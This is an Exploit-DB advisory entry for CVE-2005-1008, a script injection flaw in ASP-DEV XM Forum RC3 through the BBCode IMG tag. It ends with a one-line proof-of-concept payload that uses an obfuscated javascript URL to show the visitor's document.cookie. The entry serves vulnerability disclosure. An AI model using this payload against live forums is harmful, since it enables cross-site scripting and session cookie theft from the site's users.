ASP-DEV XM Forum RC3 IMG Tag Script Injection Vulnerability

2005-03-31T00:00:00
ID EDB-ID:25324
Type exploitdb
Reporter Zinho
Modified 2005-03-31T00:00:00

Description

ASP-DEV XM Forum RC3 IMG Tag Script Injection Vulnerability. CVE-2005-1008. Webapps exploit for asp platform

                                        
                                            source: http://www.securityfocus.com/bid/12958/info

XM Forum is reported prone to a script injection vulnerability.

An attacker can supply arbitrary HTML and script code through the BBCode IMG tag to trigger this issue and execute arbitrary script code in a user's browser.

XM Forum RC3 is reported vulnerable. It is possible that other versions are affected as well. 

[IMG]javasc+ript:alert(document.cookie)[/IMG]